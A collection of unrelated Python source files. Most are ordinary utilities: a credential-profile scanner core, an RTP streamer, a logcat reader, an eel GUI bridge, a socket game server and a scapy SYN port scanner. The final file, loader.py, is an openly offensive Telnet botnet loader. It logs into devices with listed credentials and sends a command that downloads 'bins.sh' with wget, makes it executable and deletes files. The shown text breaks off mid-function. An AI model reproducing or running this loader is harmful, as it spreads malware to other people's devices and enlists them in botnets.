        result = re.search('M(.*)SequenceGenerator', c.__name__)
        # BUG FIX: re.search returns None when the class name does not
        # match the convention; previously result.group(1) then raised
        # AttributeError and crashed the listing
        if result is not None:
            generator_names.append(result.group(1))
    return generator_names
def find_generator_by_name(generator_name):
    """
    Get the sequence generator class name given its name

    Args:
        generator_name (str): short generator name, e.g. 'BPNet'

    Returns:
        str: sequence generator class name, or None if no derived
        class of MSequenceGenerator matches
    """
    for c in MSequenceGenerator.__subclasses__():
        result = re.search('M(.*)SequenceGenerator', c.__name__)
        # BUG FIX: guard against subclasses whose names don't match the
        # M<Name>SequenceGenerator convention (re.search returns None)
        if result is not None and generator_name == result.group(1):
            return c.__name__
    # explicit None for "not found" (was an implicit fall-through)
    return None
|
core.py | #!/usr/bin/env python3
# -*- coding=utf-8 -*-
"""
核心控制器
1. 解析命令
2. 调用对应插件
3. 返回结果
"""
import sys
import queue
import logging
import click
from threading import Thread
from prettytable import PrettyTable
from . import addons
from .settings import opts
from .passwd import Passwd
class TPCore(object):
    """
    Core controller: loads scanners for live targets, fans the scan work
    out over worker threads, and provides search/update/list commands
    over the local password profiles.
    """

    logger = logging.getLogger("TotalPass")
    # class-level work queue shared by all scanner worker threads
    _q_scanners = queue.Queue()

    def __init__(self):
        pass
        # self.logger = logging.getLogger("TotalPass")
        # self._q_scanners = queue.Queue()

    @classmethod
    def anyscan(cls):
        """Scan every live target with all loaded credential scanners,
        using a pool of opts.threads worker threads."""
        click.echo("Checking if the target ports are open...")
        scanners = []
        for t in opts.targets:
            if t.alive():
                scanners += t.load_scanners()
        click.echo("\nLoaded %i credential profiles." % len(opts.passwds))
        click.echo("Loaded %i unique scanners.\n" % len(scanners))
        for s in scanners:
            cls._q_scanners.put(s)
        tasks = []
        for i in range(opts.threads):
            t = Thread(target=cls._scan_worker)
            t.start()
            tasks.append(t)
        # block until every queued scanner has been task_done()'d
        cls._q_scanners.join()
        opts.running = False
        # one None sentinel per worker unblocks any thread still in get()
        for i in range(opts.threads):
            cls._q_scanners.put(None)
        for t in tasks:
            t.join()

    @classmethod
    def _scan_worker(cls):
        """Worker loop: pop scanners off the shared queue and run them.

        NOTE(review): the empty() pre-check is racy -- a worker may exit
        while items are still in flight, which would leave join() in
        anyscan() blocked; also the None sentinels are never
        task_done()'d. Works in the current single-pass flow because
        join() completes before sentinels are queued, but confirm
        before reusing this class elsewhere.
        """
        while opts.running and not cls._q_scanners.empty():
            s = cls._q_scanners.get()
            if s is None:
                break
            s.scan()
            cls._q_scanners.task_done()

    @classmethod
    def anysearch(cls, keywords, verbose):
        """Search passwords in the local credential profiles.

        Verbosity 0 prints unique credential pairs, 1 prints a table,
        2+ dumps the full YAML of every matching profile.
        """
        click.echo("Searching passwords from profiles...")
        passwds = Passwd.load()
        matched = []
        click.echo("[+] Loaded %s passwd profiles." % len(passwds))
        if verbose < 1:
            for passwd in passwds:
                if passwd.match(keywords):
                    matched += passwd.creds()
            # de-duplicate credential pairs before printing
            matched = set(matched)
            print("\n")
            for x in matched:
                print(x)
            print("\n")
        elif verbose < 2:
            for passwd in passwds:
                if passwd.match(keywords):
                    matched += passwd.cred_rows()
            pt = PrettyTable(["Username", "Password", "Name"])
            pt.align["Name"] = "l"
            for row in matched:
                pt.add_row(row)
            print(pt.get_string())
        else:
            for passwd in passwds:
                if passwd.match(keywords):
                    print("\n-----------------------------")
                    print(passwd.yaml())
                    matched.append(passwd.yaml())
        if matched:
            click.secho("[+] Found %s passwd." % len(matched), fg="green")
        else:
            click.secho("[x] No matching passwd profile found.", fg="red")

    @classmethod
    def anyupdate(cls):
        """Update the local password profiles from cirt.net."""
        click.echo("Updating passwords from cirt.net...")
        # imported lazily so the network-dependent module is only loaded
        # when an update is actually requested
        from .cirt import CirtPass
        try:
            CirtPass.update()
            click.secho("[+] Passwords update completed.", fg="green")
        except Exception as e:
            click.secho("[x] Passwords update failed.", fg="red")
            print("%s Exception: %s" % (type(e).__name__, str(e)))

    @classmethod
    def anylist(cls):
        """List all supported device/service profiles and their
        credential counts."""
        click.echo("Loading passwords from profiles...")
        pt = PrettyTable(["Name", "Category", "Port", "Passwd Count"])
        pt.align["Name"] = "l"
        table = Passwd.table()
        for row in table:
            pt.add_row(row)
        print(pt.get_string())
        click.secho("[+] Loaded %s passwd profiles." % len(table), fg="green")
|
_debugger_case_multiprocessing.py | import time
import multiprocessing
def run(name):
    # Child-process entry point. The trailing "# break N here" comments are
    # breakpoint anchors used by the debugger test harness -- keep them
    # attached to their lines.
    print("argument: ", name) # break 1 here

if __name__ == '__main__':
    multiprocessing.Process(target=run, args=("argument to run method",)).start()
    # NOTE(review): 'SUCEEDED' is misspelled, but the harness may match this
    # exact output string -- do not "fix" it without updating the expectation.
    print('TEST SUCEEDED!') # break 2 here
|
Streamer.py | import socket, time, threading, sys
from protocols.RTP import RTP
from .Camera import Camera
from .Mic import Mic
class Streamer:
    """Streams frames from local capture devices (camera/mic) to one client
    over UDP as RTP packets, with one background thread per device."""

    # maximum UDP payload sent per sendto() call
    DEFAULT_CHUNK_SIZE = 4096

    class MEDIA_TYPE:
        # RTP payload-type value used for every stream
        STRING = 0

    def __init__(self, client_ip):
        # , client_port, file_path
        self.client_ip = client_ip
        # device name -> (udp socket, client port), filled by add_device()
        self.rtp_sockets = dict()
        # device name -> capture device instance
        self.devices = dict()
        # device name -> [thread, keep_running flag]
        self.threads = dict()
        self.available_devices = {"camera": Camera, "mic": Mic}

    def start_stream(self, device):
        """Spawn the background streaming thread for *device*.

        NOTE(review): assumes add_device() was called first for this
        device; otherwise stream() raises KeyError on self.devices.
        """
        print("Starting streaming %s" % device)
        self.threads[device] = [
            threading.Thread(target=self.stream, args=(device,)),
            True,
        ]
        self.threads[device][0].start()
        print("Daemon %s" % device)

    def stream(self, device):
        """Thread body: pull frames from *device* and ship them as RTP
        packets until the device's keep-running flag is cleared."""
        print("Start Streaming video to target client")
        while self.threads[device][1]:
            # frame = self._video_stream.get_next_frame()
            # frame_number = self._video_stream.current_frame_number
            frame = self.devices[device].get_frame()
            if frame:
                # NOTE(review): seq_num is always 0, so a receiver cannot
                # detect packet loss or reordering -- confirm intent.
                rtp_packet = RTP(
                    payload_type=self.MEDIA_TYPE.STRING,
                    seq_num=0,
                    timestamp=int(time.time()),
                    payload=frame,
                )
                # print(f"Sending packet #{frame_number}")
                # print('Packet header:')
                # rtp_packet.print_header()
                packet = rtp_packet.get_packet()
                self.send_rtp_packet(device, packet)
            # audio is paced much faster than video
            if device == "mic":
                time.sleep(0.0095)
            else:
                time.sleep(0.1)

    def send_rtp_packet(self, device, packet):
        """Send *packet* to the client, split into DEFAULT_CHUNK_SIZE
        UDP datagrams; gives up on the first socket error."""
        rtp_socket, client_port = self.rtp_sockets[device]
        print(device, client_port)
        # if device == 'mic':
        #     return
        # print(device, "sending", packet)
        to_send = packet[:]
        while to_send:
            try:
                rtp_socket.sendto(
                    to_send[: self.DEFAULT_CHUNK_SIZE], (self.client_ip, client_port)
                )
                # brief pause between chunks to avoid flooding the socket
                time.sleep(0.0035)
            except socket.error as e:
                print(f"failed to send rtp packet: {e}")
                return
            to_send = to_send[self.DEFAULT_CHUNK_SIZE :]

    def add_device(self, port, device):
        """Register capture *device* plus the UDP socket/port used to
        stream it; unknown device names are silently ignored."""
        if device not in self.available_devices:
            return
        self.devices[device] = self.available_devices[device]()
        print(self.devices)
        print("Add device: %s" % device)
        port = int(port)
        self.rtp_sockets[device] = (
            socket.socket(socket.AF_INET, socket.SOCK_DGRAM),
            port,
        )
        print("Target: %s:%d" % (self.client_ip, port))
if __name__ == "__main__":
video_streamer = VideoStreamer("video.mp4")
|
op_support.py | import multiprocessing
import os
import shlex
import guild.system
import guild.util
def python_cmd_for_spec(spec, section):
    """Build the ``python`` argv for running *spec* within *section*.

    The first token of *spec* is resolved to a script path relative to the
    section's project directory; remaining tokens are passed through, and
    the section's flags are appended as sorted ``--name value`` pairs.
    """
    parts = shlex.split(spec)
    script = _resolve_script_path(parts[0], section.project.dir)
    flags = section.all_flags()
    flags.sort()
    cmd = ["python", "-u", script]
    cmd.extend(parts[1:])
    cmd.extend(_flag_args(flags))
    return cmd
def _resolve_script_path(script, project_dir):
    """Resolve *script* to a concrete path under *project_dir*.

    NOTE(review): relies on ``guild.util.find_apply``, which presumably
    returns the first non-None result of applying the candidate functions
    in order -- i.e. an existing file, then the same path with ``.py``
    appended, then the unmodified path as a last resort. Confirm against
    guild.util's documentation.
    """
    script_path = _script_path_for_project_dir(script, project_dir)
    return guild.util.find_apply(
        [_explicit_path,
         _path_missing_py_ext,
         _unmodified_path], script_path)
def _script_path_for_project_dir(script, project_dir):
rel_path = os.path.join(project_dir, script)
if project_dir == ".":
return rel_path
else:
return os.path.abspath(rel_path)
def _explicit_path(path):
return path if os.path.isfile(path) else None
def _path_missing_py_ext(part_path):
    """Try *part_path* again with a ``.py`` suffix appended."""
    candidate = part_path + ".py"
    return _explicit_path(candidate)
def _unmodified_path(val):
return val
def _flag_args(flags):
args = []
for name, val in flags:
args.append("--" + name)
args.append(str(val))
return args
def base_env():
    """Environment variables common to every operation."""
    gpu_count = guild.system.gpu_count()
    return {"GPU_COUNT": str(gpu_count)}
def rundir_env():
    """base_env() plus the run-directory placeholder variable."""
    env = base_env()
    env["RUNDIR"] = "%(opdir)s"
    return env
def start_task(target, args, op):
    """Launch *target* in a child process.

    The child receives (op, stop_conn, *args); the parent keeps the other
    end of the stop pipe. Returns (process, parent_stop_conn).
    """
    child_conn, parent_conn = multiprocessing.Pipe()
    proc = multiprocessing.Process(target=target, args=[op, child_conn] + args)
    proc.start()
    return (proc, parent_conn)
def stop_task(task_, grace_period):
    """Ask the task to stop; force-terminate if still alive afterwards.

    *task_* is the (process, stop_conn) pair returned by start_task.
    """
    task, stop_conn = task_
    if not task.is_alive():
        return
    stop_conn.send("stop")
    # give the task up to grace_period seconds to acknowledge
    stop_conn.poll(grace_period)
    if task.is_alive():
        task.terminate()
def task_pipe():
    """Return a fresh duplex Pipe for parent/task communication."""
    return multiprocessing.Pipe()
|
Multithreaded_Portscanner.py | #!/bin/bash/python
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import socket
import time
import sys, signal
import os
from scapy.all import *
from Queue import Queue
from threading import Thread
from subprocess import PIPE, Popen, call
# Timestamped log/data file names are derived from the shell `date` command
# (Python 2 script; Popen output is a str).
date = Popen('date +"%m-%d-%y"', shell = True, stdout = PIPE).stdout.read().split('\n')[0]
c_time = Popen("date | awk '{print $4}'", shell = True, stdout = PIPE).stdout.read().split('\n')[0]
file = open('bin/logs/'+str(date)+'/Port_sc.log','a')
file.write('Port Scanner '+str(time.ctime())+'\n\n')
os.system('clear')
print "\n\n\n\033[1m\033[36m PORT SCANNER\033[0;0m\n"
# Connectivity probe: a DNS lookup of google.com decides whether we are
# online; on failure we log it and bounce back to the main menu.
try:
    sys.stdout.write(" [*]\033[94m Internet Connection Status \033[0;0m :")
    sys.stdout.flush()
    if socket.gethostbyname('www.google.com'):
        file.write('Connected: '+str(time.ctime()))
        sys.stdout.write("\033[92m CONNECTED\033[0;0m\n\n")
except:
    sys.stdout.write("\033[91m NOT CONNECTED\033[0;0m\n")
    file.write('Connection Lost: '+str(time.ctime()))
    sys.stdout.write(" [-] Please Check Your Internet Connection!\n\n")
    time.sleep(2)
    os.system('clear; python main/MainWindow.py')
def run(q,urlip):
try:
file.write('Scanning (0) : '+str(time.ctime()))
while True:
try:
port=q.get()
response = sr1(IP(dst=urlip)/TCP(dport=port, flags='S'),verbose=False, timeout=1,retry=3)
if response:
if response[TCP].flags == 18:
try:
s=socket.getservbyport(port)
sys.stdout.write(" Open Port: [ "+str(port)+" ] : "+str(s)+"\n")
data.write(str(port)+' : '+str(s)+'\n')
except:
sys.stdout.write(" Open Port: [ "+str(port)+" ] : NA \n")
data.write(str(port)+' : '+str(s)+'\n')
except Exception as e:
pass
q.task_done()
file.write('Scanning (1): '+str(time.ctime()))
except Exception:
print ' Port Scanner Has\033[91m Stopped\033[0;0m Working!'
data.close()
file.close()
os.kill(os.getpid(), signal.SIGKILL)
# Unbounded work queue of port numbers to probe, drained by 40 daemon workers.
q = Queue(maxsize =0)
threads = 40
try:
    urlip=raw_input(" Enter URL or IP To Scan : ")
    startport=int(input(" Start Scan From Port Number : "))
    endport=int(input(" Scan Upto Port Number : "))
    #data.write(str(urlip)+'\n'+str(startport)+'\n'+str(endport)+'\n\n')
except Exception:
    # bad input: restart the scanner menu
    print '\n'
    os.system('clear')
    sys.stdout.write("\n \033[91mINVALID\033[0;0m Input, Please Try Again!")
    sys.stdout.flush()
    os.system('python main/Multithreaded_Portscanner.py')
print "\n \033[94m [*] SCANNING FOR OPEN PORTS...\033[0;0m \n"
# enqueue the inclusive port range
for j in range(startport,endport+1):
    q.put(j)
data = open('bin/data/'+str(date)+'/port_sc/Port_sc_'+str(c_time)+'.log','a')
data.write('Port Scanner '+str(time.ctime())+'\n\n')
# spin up the daemon worker pool, then block until every port is task_done()'d
for i in range(threads):
    thread = Thread(target=run, args=(q,urlip,))
    thread.setDaemon(True)
    thread.start()
q.join()
data.write('\n--------------END-------------')
data.close()
file.close()
print "\n \033[92mSCAN COMPLETED\033[0;0m"
|
logcat.py | from threading import Thread
from adb import PrematureEOFError
import logging
from functools import wraps
from logcat_parser import LogcatStreamParser, MessageParser
def cb_wrap(cb):
    """Wrap callback *cb* so exceptions it raises are logged instead of
    propagating into the reader thread.

    Returns:
        The wrapped callable; it returns cb's result, or None when cb raised.
    """
    @wraps(cb)
    def wrap(*largs, **kwargs):
        try:
            return cb(*largs, **kwargs)
        except Exception:
            # BUG FIX: was a bare `except:`, which also swallowed SystemExit
            # and KeyboardInterrupt; only genuine errors should be logged here
            logging.exception("(in tracker callback)")
    return wrap
class LogcatParser:
    """Thin adapter exposing a fixed-size read over a raw connection."""

    def __init__(self, conn):
        self.conn = conn

    def readLine(self):
        # reads up to 128 bytes per call; not actually line-delimited
        return self.conn.read(128)
class MyLogcatStreamParser(LogcatStreamParser):
    """LogcatStreamParser variant that collapses CRLF pairs into a single LF.

    adb transports often CRLF-mangle logcat output; this subclass keeps a
    one-byte look-ahead so every b'\r\n' pair is delivered as b'\n'.
    """

    def __init__(self, conn, lah=b''):
        # one-byte look-ahead buffer; may be pre-seeded by the caller
        self._look_ahead = lah
        super().__init__(conn)

    def _read_raw(self, size):
        # raw, untranslated read from the underlying stream
        # (self._stream is presumably set by the base class -- confirm)
        return self._stream.read(size)

    def _read_one(self):
        """Return the next single byte with CRLF translated to LF."""
        if self._look_ahead:
            if self._look_ahead != b'\r':
                # plain buffered byte: emit it directly
                ret = self._look_ahead
                self._look_ahead = b''
                return ret
            else:
                # buffered byte is '\r': fall through to the pairing logic
                cur = self._look_ahead
                self._look_ahead = b''
        else:
            cur = self._stream.read(1)
        if cur != b'\r':
            return cur
        else:
            # peek one byte: swallow the '\r' of a CRLF pair, otherwise keep
            # the peeked byte for the next call and emit the bare '\r'
            cur2 = self._stream.read(1)
            if cur2 == b'\n':
                return b'\n'
            else:
                self._look_ahead = cur2
                return cur

    def read(self, size, timeout=None):
        # NOTE(review): 'h' is computed but unused, and 'timeout' is accepted
        # only for interface compatibility -- neither affects behavior.
        h = self._look_ahead
        ret = b''.join([self._read_one() for i in range(size)])
        return ret
class MyMessageParser(MessageParser):
    """MessageParser that additionally snapshots all parsed fields into a
    plain dict (self._data) for easy serialization to the callback."""

    def __init__(self, parser):
        super().__init__(parser)
        # NOTE(review): assumes *parser* is mapping-like (has .items()) and
        # that the base class sets _priority/_tag/_message -- confirm against
        # logcat_parser.MessageParser.
        self._data = dict(parser.items())
        self._data.update({
            'priority': self._priority,
            'tag': self._tag,
            'message': self._message,
        })
class FpWrapper:
    """Buffering adapter around a file-like object.

    Guarantees that read(n) returns exactly n bytes unless the underlying
    stream hits EOF first (in which case it returns whatever remains).
    """

    def __init__(self, fp):
        self.fp = fp
        self._buf = b''    # buffered data not yet fully consumed
        self._off = 0      # read offset into _buf
        self._eof = False  # underlying stream exhausted

    def _read_chunk(self):
        """Pull up to 4 KiB more into the buffer; flag EOF on empty read."""
        buf = self.fp.read(4096)
        if not buf:
            self._eof = True
            return
        if self._off:
            # drop the already-consumed prefix before growing the buffer
            self._buf = self._buf[self._off:]
            self._off = 0
        self._buf += buf

    def read(self, size):
        """Return up to *size* bytes; shorter only at EOF.

        (Parameter renamed from ``bytes``, which shadowed the builtin;
        all in-repo callers pass it positionally.)
        """
        while len(self._buf) < self._off + size and not self._eof:
            self._read_chunk()
        ret = self._buf[self._off: self._off + size]
        self._off += len(ret)
        return ret
class Logcat:
    """Reads parsed logcat messages off *conn* on a daemon thread and feeds
    each one to *cb* until EOF or until the callback returns a falsy value.

    The callback receives {"what": "log", "msg": <dict>} per message and a
    final {"what": "eof"} when the stream ends.
    """

    def __init__(self, conn, cb):
        self.cb = cb_wrap(cb)
        self.conn = conn
        self.fp = FpWrapper(conn)
        thread = Thread(target=self._readdevices_loop, name="Logcat")
        # Thread.setDaemon() is deprecated since Python 3.10; assign the
        # daemon attribute directly instead
        thread.daemon = True
        thread.start()

    def _readdevices_loop(self):
        """Thread body: parse messages and dispatch them to the callback."""
        try:
            while 1:
                # NOTE(review): indexing the parser (_parser[0]) implies the
                # base LogcatStreamParser is subscriptable -- confirm.
                _parser = MyLogcatStreamParser(self.fp)
                message = MyMessageParser(_parser[0])
                if not self.cb({"what": "log", "msg": message._data}):
                    break
        except PrematureEOFError:
            pass
        finally:
            # always notify the consumer and release the connection
            self.cb({"what": "eof"})
            self.conn.close()
eelinterface.py | import os
import threading
import traceback
from typing import Dict, List
import eel
from src.sammie.py.ModuleConnector import ModuleConnector
from src.sammie.py.SessionData import SessionData
from src.py.__config import getModuleConnector
from src.sammie.py.modules.FileLoader import FileLoader
from src.sammie.py.modules.ModuleBase import ModuleBase
# counter for async execution keys (currently assigned but not incremented here)
executionKey: int = 0
# toggles verbose request logging for runStep/runStepAsync
log = True
# Stores module instances by their ID
modulesById: Dict[str, ModuleBase] = {}
# Stores module instances by their Thread Execution key, allows to kill if necessary
modulesByExecutionKey: Dict[str, ModuleBase] = {}
# Sessiondata stores all the information produced by Modules
session: SessionData = SessionData()
# Module Connector initializes modules, aggregators, loaders
moduleConnector: ModuleConnector = getModuleConnector()
# Loader is a specific module, that loads files
fileLoader: FileLoader = FileLoader(session, moduleConnector)
# Stores parameters passed to newly initialized modules/steps in the pipeline
pipelineParams: Dict = {}
def getModule(moduleID: str, moduleName: str):
    """Return the module instance registered under *moduleID*, creating it
    from its pipeline parameters on first use."""
    # parameter lookup happens unconditionally: a module without registered
    # pipeline params is an error even if an instance is already cached
    params = pipelineParams[moduleID]
    try:
        return modulesById[moduleID]
    except KeyError:
        instance = moduleConnector.initializeModule(
            moduleID, moduleName, params, session)
        modulesById[moduleID] = instance
        return instance
def startThreadInModule(m: ModuleBase, asyncKey: int, params):
    """Worker-thread body: run m.run(*params) and report the result or the
    error back to JS via eel callbacks keyed by *asyncKey*."""
    print("[Eel]: Started Run in separate thread with execKey %s"%(asyncKey))
    m.startingRun()  # mark the run as started so it can be aborted
    try:
        res = m.run(*params)
    except Exception as e:
        traceback.print_exc()
        print("[Eel]: Error or Abort in Thread %s"%(asyncKey))
        eel.asyncError(asyncKey, {'errorText':str(e)})
        return
    print("[Eel]: Ending Thread %s"%(asyncKey))
    eel.asyncFinished(asyncKey,res)
@eel.expose
def loadInputFile(pipelinekey:str, path:str, loaderName:str, loaderArgs:Dict, batchPreviewIdx:int = -1):
    """Load the file at *path* into the pipeline input slot *pipelinekey*.

    Args:
        pipelinekey (str): key identifying this input in the pipeline
        path (str): full path of the file to load
        loaderName (str): loader function name (see src/py/loaders/fileloaders.py)
        loaderArgs (Dict): extra arguments forwarded to the loader
        batchPreviewIdx (int): batch number when loading a preview only; -1
            (the default) loads the file into the session for real

    Returns: a JS object with a preview URL and some metadata on this file.
    """
    print('[Eel]: Loading Input %s: %s (preview #%d):' % (pipelinekey,path,batchPreviewIdx))
    if batchPreviewIdx != -1:
        # preview-only load: the data is not committed to the session
        return fileLoader.loadFilePreview(pipelinekey,batchPreviewIdx,path,loaderName,loaderArgs)
    return fileLoader.loadFile(pipelinekey,path,loaderName,loaderArgs)
@eel.expose
def exportData(moduleID:str, pipelinekey:str, path:str, overwrite:bool, exporterArgs:Dict = None):
    """Export *pipelinekey*'s data from module *moduleID* to *path*.

    Args:
        overwrite (bool): when False an existing file aborts the export.
        exporterArgs (Dict): optional keyword arguments for the exporter.

    Raises:
        RuntimeError: if *path* exists and overwrite is False.
    """
    if not overwrite and os.path.exists(path):
        raise RuntimeError('File %s already exists'%path)
    # BUG FIX: exporterArgs defaults to None and `**None` raises TypeError;
    # fall back to an empty mapping when the caller omits it
    modulesById[moduleID].exportData(pipelinekey, path, **(exporterArgs or {}))
    return True
@eel.expose
def getAggregateDataInfo(aggregatorID:str, path:str, exporterArgs:Dict = None):
    """Describe the aggregate file at *path* for the given aggregator.

    `exporterArgs` is accepted for API symmetry but is not used here.
    """
    info = moduleConnector.getAggregatorFileInfo(aggregatorID, path)
    return info.toDict()
@eel.expose
def resetAggregateData(aggregatorID:str, path:str):
    """Reset the aggregator's output file at *path*."""
    result = moduleConnector.resetAggregatorFile(aggregatorID, path)
    return result
@eel.expose
def exportAggregateData(aggregatorID:str, path:str, batchnum:int, exporterArgs:Dict = None):
    """Run the aggregator over the current session/modules for *batchnum*
    and write its output to *path*."""
    outcome = moduleConnector.runAggregator(
        aggregatorID, path, session, modulesById, batchnum, exporterArgs)
    return outcome.toDict()
@eel.expose
def getBatchGlobs(patterns:List[str], allowedExtensions:List[List[str]]):
    """Expand the given glob patterns, filtering by allowed extensions."""
    matches = fileLoader.getFileGlob(patterns, allowedExtensions)
    return matches
@eel.expose
def getFolderContents(folder:str, extenstions:List[str]):
    """List *folder*'s entries filtered by the given extensions.

    (The misspelled parameter name 'extenstions' is kept: eel callers on
    the JS side may address arguments by name.)
    """
    contents = fileLoader.getFolderContents(folder, extenstions)
    return contents
@eel.expose
def onNewPipelineLoaded(pipelineID:str, pipelineParamsByModuleID:Dict = None):
    """Discard all state bound to the previous pipeline and start fresh:
    module registries, session data, connector and file loader."""
    global modulesById
    global modulesByExecutionKey
    global session
    global fileLoader
    global pipelineParams
    global moduleConnector
    pipelineParams = pipelineParamsByModuleID
    modulesById, modulesByExecutionKey = {}, {}
    session = SessionData()
    moduleConnector = getModuleConnector()
    fileLoader = FileLoader(session, moduleConnector)
    print('[EEL] New Pipeline loaded %s'%pipelineID)
    return True
# Central function for running a step with its respective parameters.
# Parameters are defined in the JS definition of module. Module will be
# instantiated if it has not been created yet.
@eel.expose
def runStep(moduleName: str, moduleID: str, action:str, params: Dict[str, str], inputs: List[str], outputs: List[str]):
    """Run one pipeline step synchronously and return its result."""
    m: ModuleBase = getModule(moduleID, moduleName)
    if log:
        inputsStr = ', '.join(inputs) if inputs is not None else '-'
        # BUG FIX: the outputs string was guarded on `inputs`, so a None
        # `outputs` with non-None inputs made join() raise TypeError
        outputsStr = ', '.join(outputs) if outputs is not None else '-'
        print('[Eel]: Running action: %s on %s(%s) with inputs: [%s] -> [%s]' % ( action, moduleID, moduleName, inputsStr,outputsStr))
    res = m.run(action, params, inputs, outputs)
    return res
# Async version of runStep.
# Will get a key that is used as an identifier for the thread.
# JS can send a termination signal with that key to stop the execution and
# it will get a callback with that key when execution is completed.
@eel.expose
def runStepAsync(threadID, moduleName: str, moduleID: str, action:str, params: Dict[str, str], inputs: List[str], outputs: List[str]):
    """Run one pipeline step on a worker thread registered under *threadID*
    so JS can abort it; completion is reported via eel callbacks."""
    m: ModuleBase = getModule(moduleID, moduleName)
    if log:
        inputsStr = ', '.join(inputs) if inputs is not None else '-'
        # BUG FIX: this guard previously tested `inputs`, so join() raised
        # TypeError whenever outputs was None while inputs was not
        outputsStr = ', '.join(outputs) if outputs is not None else '-'
        print('[Eel]: Async Running %s(%s) with inputs: [%s] -> [%s]' % ( moduleID, moduleName, inputsStr,outputsStr))
    # start execution in a separate thread, remembered so abortStep can find it
    modulesByExecutionKey[threadID] = m
    tmp = threading.Thread(target=startThreadInModule, args = (m,threadID,[action, params, inputs,outputs]) )
    tmp.start()
    # eel.spawn(startThreadInModule, m, threadID, [action, params, inputs,outputs])
@eel.expose
def abortStep(execKey:str):
    """Forward an abort signal to the module running under *execKey*."""
    m = modulesByExecutionKey.get(execKey)
    if m is None:
        print("[Eel]: Ignoring abort signal for thread %s, since it can't be found."%(execKey))
        return
    m.abort()
    print("[Eel]: Sent Abort signal to module %s in thread %s"%(m.id,execKey))
client_models.py | import threading
import socket
import time
from lib.protocol import Protocol
from lib.console import Console
class ClientHandler:
    """Accepts TCP clients, starts one reader thread per client, and owns
    the shared Distributer that broadcasts data back to all clients."""

    def __init__(self, id_counter, conf, lock):
        self.clients = []
        self.id_counter = id_counter
        self.conf = conf
        self._lock = lock
        self.console = Console(self, self._lock)
        # list of banned IP address strings
        self.banned_clients = []
        self.address = (socket.gethostbyname(self.conf.get_host()),
                        self.conf.get_port())
        self.tickrate = self.conf.get_tickrate()
        self.socket = socket.socket()
        self.init_distributer()

    def reset_id_counter(self):
        # restart client ids once the server is empty
        self.id_counter = 0

    def get_server_socket(self):
        return self.socket

    def get_console(self):
        return self.console

    def ban_client(self, ip):
        if ip not in self.banned_clients:
            self.banned_clients.append(ip)

    def unban_client(self, ip):
        if ip in self.banned_clients:
            self.banned_clients.remove(ip)

    def init_distributer(self):
        """Start the broadcast loop on a daemon thread."""
        self.distributer = Distributer(self.clients, self._lock,
                                       self.tickrate, self)
        client_thread = threading.Thread(target=self.distributer.distribute)
        client_thread.daemon = True
        client_thread.start()

    def handle(self):
        """Accept loop: greet each non-banned client and spawn its reader
        thread. Blocks forever."""
        self.socket.bind(self.address)
        self.socket.listen(5)
        while True:
            # Accept connections and add clients to clients list
            conn, addr = self.socket.accept()
            self.console.stdout("Client connected from %s:%s" %
                                (addr[0], str(addr[1])))
            self.id_counter += 1
            client = Client(conn, addr[0], addr[1], self.id_counter, self._lock)
            if client.get_ip() not in self.banned_clients:
                client.sendall(Protocol().get_hello_msg(self.tickrate,
                                                        client.get_id()))
                self.clients.append(client)
                client_listen_thread = threading.Thread(target=self._listen,
                                                        args=[client])
                client_listen_thread.daemon = True
                client_listen_thread.start()

    def _listen(self, client):
        """Per-client reader: pump recv() until an error (or a ban, which
        is forced through the same path), then drop the client."""
        while True:
            try:
                if client.get_ip() in self.banned_clients:
                    # force-disconnect banned clients via the except path
                    raise Exception
                client.recv()
            except Exception as e:
                self.console.stdout(
                    "Client {}:{} has been disconnected.".format(
                        client.get_ip(),client.get_port()))
                self.clients.remove(client)
                break
class Client:
    """One connected client: its socket, endpoint info, id and the most
    recently received payload."""

    def __init__(self, socket, ip, port, client_id, lock):
        self.socket = socket
        self.ip = ip
        self.port = port
        self.id = client_id
        self._lock = lock
        self.latest_data = ""

    def sendall(self, data):
        # best-effort send; a dead socket is detected by the listen loop
        try:
            self.socket.sendall(data)
        except:
            pass

    def recv(self):
        raw = str(self.socket.recv(4096), "Latin-1")
        # keep the last complete message (the chunk before the final end tag)
        self.latest_data = raw.split(Protocol().get_end_tag())[-2]

    def get_socket(self):
        return self.socket

    def get_id(self):
        return self.id

    def get_ip(self):
        return self.ip

    def get_port(self):
        return self.port

    def get_latest_data(self):
        return self.latest_data
class Distributer:
    """Broadcasts the newest payload of every client to all clients once per
    tick, throttled to the configured tickrate."""

    def __init__(self, clients, lock, tickrate, client_hdl):
        self.clients = clients
        self._lock = lock
        self.tickrate = tickrate
        self.client_hdl = client_hdl
        self.console = self.client_hdl.get_console()

    def tick(self, loop_time):
        """Sleep away the remainder of the tick budget; warn when over it."""
        remaining = 1 / self.tickrate - loop_time
        if remaining >= 0:
            time.sleep(remaining)
        else:
            self.console.stdout("server warning : cannot keep up with tickrate!")

    def _get_data_list(self):
        """Latest payload of every client, with empty strings dropped."""
        return [payload
                for payload in (c.get_latest_data() for c in self.clients)
                if payload != ""]

    def distribute(self):
        """Forever: collect payloads, fan them out on sender threads, tick."""
        while True:
            started = time.time()
            combined = "".join(self._get_data_list())
            for client in self.clients:
                sender = threading.Thread(
                    target=client.sendall,
                    args=[Protocol().get_data_msg(combined)])
                sender.daemon = True
                sender.start()
            if not self.clients:
                # Nobody connected: restart client-id numbering from zero.
                self.client_hdl.reset_id_counter()
            self.tick(time.time() - started)
|
loader.py | #!/usr/bin/python
# Simple Telnet Loader Modified by Deeznuts?
# You Can Find Fresh TELNET List To Load @ http://godz56.tk/telnet-list/
# Modified with more tweaks.
import sys, re, os, socket, time
from threading import Thread
if len(sys.argv) < 2:
sys.exit("\033[37mUsage: python "+sys.argv[0]+" [list]")
cmd="cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://0.0.0.0/bins.sh; chmod 777 bins.sh; rm -rf *" #command to send
info = open(str(sys.argv[1]),'a+')
def sqwad(ip,username,password):
ip = str(ip).rstrip("\n")
username = username.rstrip("\n")
password = password.rstrip("\n")
try:
tn = socket.socket()
tn.settimeout(5)
tn.connect((ip,23))
except Exception:
print "\033[32m[\033[31m+\033[32m] \033[31mFailed To Connect!\033[37m %s"%(ip)
tn.close()
try:
hoho = ''
hoho += readUntil(tn, "ogin")
if "ogin" in hoho:
tn.send(username + "\n")
print "\033[32m[\033[31m+\033[32m] \033[35mSending Username!\033[37m %s"%(ip)
time.sleep(0.09)
else:
pass
except Exception:
tn.close()
try:
hoho = ''
hoho += readUntil(tn, "assword:")
if "assword" in hoho:
tn.send(password + "\n")
print "\033[32m[\033[33m+\033[32m] \033[36mSending Password!\033[37m %s"%(ip)
